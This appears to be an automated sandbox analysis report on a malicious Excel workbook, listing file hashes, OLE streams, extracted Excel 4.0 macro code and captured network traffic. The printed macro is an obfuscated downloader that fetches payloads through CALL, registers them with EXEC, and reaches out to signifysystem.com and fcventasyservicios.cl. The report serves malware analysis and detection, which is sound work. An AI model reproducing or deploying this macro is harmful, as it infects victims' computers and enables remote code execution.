                                                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                                                                                                                                                  Entropy (8bit):3.258986427712615
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                                  File name:090811fa_by_Libranalysis.xls
                                                                                                                                                                                                  File size:375808
                                                                                                                                                                                                  MD5:090811fa4bbb26277eebc82843f3d70e
                                                                                                                                                                                                  SHA1:135d07236adba8e6441c72df1b7f2c459505583c
                                                                                                                                                                                                  SHA256:11dad18ad216bbbf97891c947ef3b70acd0c5a9a0ce80a9f5c4bcaecd7275164
                                                                                                                                                                                                  SHA512:469ec22e3b2e86bdc5f6d32e3e299ee69f0d12620c0f7486361f19258e7900b3892c8a5d2b1257bdd0188cbe5f9bae7e489dd3f4f17cd5cd81b69abdfa7738d0
                                                                                                                                                                                                  SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbcN:vUGAt6Uqa5DPdG9uS9QLp4l+s+Y8
                                                                                                                                                                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                  Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                                  Static OLE Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Document Type:OLE
                                                                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                                                                  OLE File "090811fa_by_Libranalysis.xls"

                                                                                                                                                                                                  Indicators

                                                                                                                                                                                                  Has Summary Info:True
                                                                                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                                                                                  Encrypted Document:False
                                                                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                                                                  Flash Objects Count:
                                                                                                                                                                                                  Contains VBA Macros:True

                                                                                                                                                                                                  Summary

                                                                                                                                                                                                  Code Page:1251
                                                                                                                                                                                                  Author:van-van
                                                                                                                                                                                                  Last Saved By:vi-vi
                                                                                                                                                                                                  Create Time:2006-09-16 00:00:00
                                                                                                                                                                                                  Last Saved Time:2021-05-12 07:24:11
                                                                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                                                                  Security:0

                                                                                                                                                                                                  Document Summary

                                                                                                                                                                                                  Document Code Page:1251
                                                                                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                                                                                  Contains Dirty Links:False

                                                                                                                                                                                                  Streams

                                                                                                                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                  General
                                                                                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                                                  Entropy:0.287037498961
                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                  General
                                                                                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                                                  Entropy:0.290777742057
                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                                                                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                                                                                                                                                  General
                                                                                                                                                                                                  Stream Path:Book
                                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                                                                  Stream Size:363283
                                                                                                                                                                                                  Entropy:3.24522262131
                                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                                                                  Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                                                                  CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                                                                                                                                                  
                                                                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                                                                  "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                                                                                                                                                  "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  May 12, 2021 16:56:29.413783073 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:29.571599960 CEST44349708192.185.39.58192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:29.571790934 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:29.900312901 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:30.058346033 CEST44349708192.185.39.58192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.062084913 CEST44349708192.185.39.58192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.062156916 CEST44349708192.185.39.58192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.062208891 CEST44349708192.185.39.58192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.062333107 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:30.062381029 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:30.167279959 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:30.325638056 CEST44349708192.185.39.58192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.326411009 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:30.327212095 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:30.529558897 CEST44349708192.185.39.58192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.568089008 CEST44349708192.185.39.58192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.568279028 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:30.568346977 CEST44349708192.185.39.58192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.568392038 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:30.568430901 CEST49708443192.168.2.3192.185.39.58
                                                                                                                                                                                                  May 12, 2021 16:56:30.639555931 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:30.726984024 CEST44349708192.185.39.58192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.803270102 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.803477049 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:31.070641041 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:31.235189915 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:31.237541914 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:31.237565041 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:31.237584114 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:31.237627983 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:31.237673044 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:31.247757912 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:31.412435055 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:31.412559986 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:31.413440943 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:31.616662025 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:32.124622107 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:32.124716043 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:32.124783039 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:32.124849081 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:32.136591911 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                  May 12, 2021 16:56:32.299206972 CEST44349709192.185.32.232192.168.2.3

                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  May 12, 2021 16:56:07.383454084 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:07.432264090 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:10.469662905 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:10.522115946 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:12.256792068 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:12.308567047 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:17.121038914 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:17.174669027 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:23.276236057 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:23.325968027 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:24.369828939 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:24.418529034 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:24.929033041 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:25.016128063 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:25.435720921 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:25.507268906 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:26.438961983 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:26.487901926 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:27.487072945 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:27.537051916 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:28.300467968 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:28.353250980 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:29.362160921 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:29.411326885 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:29.900516033 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:29.957830906 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:30.584788084 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:30.636646032 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:31.253067970 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:31.311429977 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:32.359404087 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:32.408471107 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:33.944736004 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:33.958254099 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:34.007018089 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:35.017573118 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:35.073326111 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:35.122258902 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:36.288774967 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:36.349844933 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:36.391524076 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:36.440387964 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:37.594492912 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:37.646605015 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:39.770723104 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:39.820049047 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:41.056437969 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:41.105321884 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:41.777124882 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:41.853382111 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:42.380053043 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:42.428771973 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:46.932463884 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:46.982361078 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:56:51.715992928 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:56:51.776241064 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:57:01.512068033 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:57:01.569467068 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:57:19.304564953 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:57:19.362087965 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:57:31.385874033 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:57:31.447134972 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:57:58.013056040 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:57:58.072103977 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:58:14.760457993 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:58:14.835633039 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                                  May 12, 2021 16:58:17.728671074 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                                  May 12, 2021 16:58:17.786448956 CEST53612928.8.8.8192.168.2.3

                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                  May 12, 2021 16:56:29.362160921 CEST192.168.2.38.8.8.80xbb7Standard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  May 12, 2021 16:56:30.584788084 CEST192.168.2.38.8.8.80x482eStandard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                  May 12, 2021 16:56:29.411326885 CEST8.8.8.8192.168.2.30xbb7No error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                                                                                                                                                  May 12, 2021 16:56:30.636646032 CEST8.8.8.8192.168.2.30x482eNo error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                                                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                  May 12, 2021 16:56:30.062208891 CEST192.185.39.58443192.168.2.349708CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                                  May 12, 2021 16:56:31.237584114 CEST192.185.32.232443192.168.2.349709CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  General

